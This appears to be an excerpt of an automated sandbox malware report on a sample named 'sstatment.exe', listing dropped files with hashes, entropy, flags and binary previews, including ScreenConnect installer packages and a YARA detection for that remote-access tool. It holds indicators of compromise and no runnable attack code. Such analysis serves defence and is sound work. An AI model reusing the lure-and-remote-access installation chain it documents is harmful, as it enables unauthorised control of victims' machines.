                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                  MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                  SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                  SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                  SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Users\user\Desktop\sstatment.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):321
                                                                                  Entropy (8bit):5.36509199858051
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                  MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                  SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                  SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                  SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):1086792
                                                                                  Entropy (8bit):7.793516535218678
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                  MD5:30CA21632F98D354A940903214AE4DE1
                                                                                  SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                  SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                  SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):234
                                                                                  Entropy (8bit):4.977464602412109
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                  MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                  SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                  SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                  SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                  Malicious:false
                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):4.62694170304723
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                  MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                  SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                  SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                  SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36864
                                                                                  Entropy (8bit):4.340550904466943
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                  MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                  SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                  SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                  SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):57344
                                                                                  Entropy (8bit):4.657268358041957
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                  MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                  SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                  SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                  SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):176128
                                                                                  Entropy (8bit):5.775360792482692
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                  MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                  SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                  SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                  SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.267782165666963
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                  MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                  SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                  SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                  SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                  Process:C:\Users\user\Desktop\sstatment.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4904E32F-1F5B-2CE5-B18E-779BCD958764}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966821246832764
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35T53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jx:bTiuJTXTtTPTkTTT
                                                                                  MD5:6A2ADC94DAA65C3DF41AECB62A15ABBF
                                                                                  SHA1:D9EFD7E530D7BEAA48C4975547164DD9064ED976
                                                                                  SHA-256:2310F1CADF0F56C9A1550A87D6414EB4C1495CAD375D8695E6EE6699074F37A9
                                                                                  SHA-512:25538C46A71A2692F2BBEB4AE764E83A013E3573E87D93DFC4699FBFC4459D8B57613360FEEBC24BC31478DE2FF6D6CE66511CBC831528970B8E29D87AD80900
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4904E32F-1F5B-2CE5-B18E-779BCD958764}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966821246832764
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35T53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jx:bTiuJTXTtTPTkTTT
                                                                                  MD5:6A2ADC94DAA65C3DF41AECB62A15ABBF
                                                                                  SHA1:D9EFD7E530D7BEAA48C4975547164DD9064ED976
                                                                                  SHA-256:2310F1CADF0F56C9A1550A87D6414EB4C1495CAD375D8695E6EE6699074F37A9
                                                                                  SHA-512:25538C46A71A2692F2BBEB4AE764E83A013E3573E87D93DFC4699FBFC4459D8B57613360FEEBC24BC31478DE2FF6D6CE66511CBC831528970B8E29D87AD80900
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4904E32F-1F5B-2CE5-B18E-779BCD958764}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966821246832764
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35T53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jx:bTiuJTXTtTPTkTTT
                                                                                  MD5:6A2ADC94DAA65C3DF41AECB62A15ABBF
                                                                                  SHA1:D9EFD7E530D7BEAA48C4975547164DD9064ED976
                                                                                  SHA-256:2310F1CADF0F56C9A1550A87D6414EB4C1495CAD375D8695E6EE6699074F37A9
                                                                                  SHA-512:25538C46A71A2692F2BBEB4AE764E83A013E3573E87D93DFC4699FBFC4459D8B57613360FEEBC24BC31478DE2FF6D6CE66511CBC831528970B8E29D87AD80900
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):431083
                                                                                  Entropy (8bit):6.617529896602035
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:DuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvxsse:DuH2anwohwQUv5uH2anwohwQUvxsse
                                                                                  MD5:EBDD0CE15FFAD50062C5934A2B47FF66
                                                                                  SHA1:6B223BA8D191CE1BDD1137CF39CCEAFC67A97043
                                                                                  SHA-256:D88B36E235B446BFF6A4FA3F90D87AD966193623887C9D70C08D0FC297D30157
                                                                                  SHA-512:8FD7D99855123B4605AB5FC557A023D4B12A1306922E3583308C2FE80D5ED66EB3BC3B55DFE799D1AA7FD793451AD42F40454F87F6946A00FC35D0CF5DF49DB2
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI3407.tmp, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@.jOY.@.....@.....@.....@.....@.....@......&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.1619848432390618
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72FjsSAGiLIlHVRpMh/7777777777777777777777777vDHFFsQQMWlp3XlN:JaSQI5cJWb6F
                                                                                  MD5:685A542F4213CB62C2CB686A4968349E
                                                                                  SHA1:D79352335D2E4AC235DFC79E0AA33B534B54CA9E
                                                                                  SHA-256:AC26C157803B5E3DE57EA9A6559613F6E218BD08810996137253A522DD192C74
                                                                                  SHA-512:EE967768BACCE25299E37F64B10CE6C1747C58038BE9A251440CDF54A957AA001EFC359B28966E080EE619C7DB162C9BED578D2186ACC8F2703868674E448B28
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.7958330715534179
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:y8PhDuRc06WX4uFT5h9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:dhD1eFTJwQpYf9i8kdwLmm34bt
                                                                                  MD5:B03900734CC7AD05537941CF8479E916
                                                                                  SHA1:3E8E219567B8D01F45C7BC49DD2282CCAC4239F4
                                                                                  SHA-256:906C78A62BEA376DB3E56B513AB002E65E5F73A2054E3C94B9A8A7B2D9BC94C4
                                                                                  SHA-512:491B4019E71A93CF7184643D0BC8666AD457F8FC5D7D9718A1C904471CF3F83C61D4DB66D1DB477F5E4C714E382AF0132ABD9ABBAEFA48456CA8256F87CD8276
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                                  Category:dropped
                                                                                  Size (bytes):7668
                                                                                  Entropy (8bit):7.864444854228408
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                                  MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                                  SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                                  SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                                  SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                                  Malicious:false
